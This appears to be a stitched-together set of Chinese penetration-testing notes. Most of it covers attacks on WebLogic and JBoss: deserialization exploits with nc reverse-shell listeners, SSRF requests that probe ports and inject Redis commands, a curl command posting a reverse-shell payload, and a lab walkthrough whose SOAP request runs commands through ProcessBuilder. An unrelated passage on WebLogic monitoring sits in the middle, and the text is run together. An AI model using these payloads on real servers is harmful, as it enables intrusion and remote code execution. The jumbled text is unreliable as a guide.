1099 CommonsCollections1 'nc -nv 反弹ip 反弹端⼝'监听nc -lvvp 6666运⾏python CVE-2018-2628.pyWeblogic 10.0.2 -- 10.3.6 ssrfburp发包，探测端⼝GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001 HTTP/1.1Host: localhostAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: close不存在则返回could not connectRedis反弹shellGET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.18.0.3:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn Host: localhostAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeJBOSSJBoss 5.x/6.x 反序列化漏洞（CVE-2017-12149）javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.javajava -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:port //⽣成⼀个ReverseShellCommonsCollectionsHashMap.ser⼆进制⽂件nc -l -vv 9999curl http://192.168.1.109:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser弱⼝令 getshell过程 admin:admin以下引⽤Nmask: 访问管理页⾯，查看jboss配置页⾯中的JMX Console，这是JBoss的管理台程序，进⼊后找到Jboss.deployment包，该包下有flavor=URL.type=DeploymentSccanner选项。

中间件Weblogic管理监控注意事项Weblogic监控的目的：发现系统中的隐患及系统运行是否稳定.主要从以下几方面进行检查:一、操作系统:检查系统cpu、内存等使用是否异常。

如在负载不大的情况下，cpu是否一直居高不下，内存占用是否一直很大。

可以通过top(topas）、vmstat、free –m、ps等命令查看。

二、网络：1、位于一个domain中各个服务器是否能够联通。

2、weblogic服务器与数据库服务器的链接是否畅通。

三、Weblogic1、检查是否对jvm进行了优化，如最大堆内存、最小堆内存,以及gc算法是否合理.2、检查gc是否正常主要是通过weblogic控制台,查看jvm的空闲内存的变化情况，每次gc的回收情况。

特别是可以在控制台强制垃圾回收，看看回收的内存是否太小。

如果回收的内存太小，说明可能存在内存益处的隐患。

3、检查线程数通过weblogic控制台可以查看线程数的统计信息.weblogic9及以上的线程是自优化的。

但应该查看系统的线程最大数是否过大,如果过大，就要注意系统为什么会有这么大的压力.如下为示例截图Active Execute Threads：在活动的线程池内处理请求的线程个数Execute Thread Total Count：线程池内线程的总数Execute Thread Idle Count:池内的空闲线程数。

它不包含stuck和standby 的线程数。

它是指等待接收新请求到来并处理的线程个数queue length :请求队列的长度,及队列中等待线程处理的请求的个数hogging thread count ：线程处理一个请求时间超过一定值被视为hogging 状态，如果继续处理请求超过一定时间将被视为stuck,或处理完请求后被放回线程池standby thread count ：统计在standby（备用)线程池内的线程数。

这些线程不需要处理当前请求被放入standby池内，当活动的线程池内需要更多线程时，这些线程将被激活。

靶机练习-ATTCK红队评估实战靶场⼆-2.WebLogic漏洞利⽤端⼝扫描174.140端⼝扫描结果：174.141端⼝扫描结果：Weblogic漏洞扫描174.140的7001端⼝是Weblogic的端⼝，⽤Weblogic漏洞扫描⼯具进⾏扫描：找到了管理后台，尝试了简单的⼝令爆破，⽊有成功，另外还发现了SSRF漏洞和Java反序列化漏洞，SSRF漏洞可以⽤来探测内⽹服务器以及端⼝是否存在。

关闭上帝视⾓，⽬前是不知道内⽹⽹段的，猜起来也挺费劲，先试试Java反序列化漏洞。

漏洞利⽤1.msf expmsf有现成的exp，赶紧⽤起来：⽊有执⾏成功，猜测原因可能是msf的攻击⽬标是Unix，⽽我的⽬标机器是Window。

2.⼿⼯命令执⾏接下来借助burp⼿动执⾏：POST /_async/AsyncResponseService HTTP/1.1Host: 192.168.174.140:7001User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2content-type: text/xmlConnection: keep-aliveAccept-Encoding: gzip, deflateContent-Length: 731<soapenv:Envelope xmlns:soapenv="/soap/envelope/" xmlns:wsa="/2005/08/addressing" xmlns:asy="/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="/2004/06/soap/workarea/"><void class="ng.ProcessBuilder"><array class="ng.String" length="3"><void index="0"><string>cmd</string></void><void index="1"><string>/c</string></void><void index="2"><string>calc.exe</string></void></array><void method="start"/></void></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>View Code试了⼀下只要soapenv构造没问题，⽆论命令失败还是成功都会返回202，并且⽊有回显，⽐较尴尬 >_<...。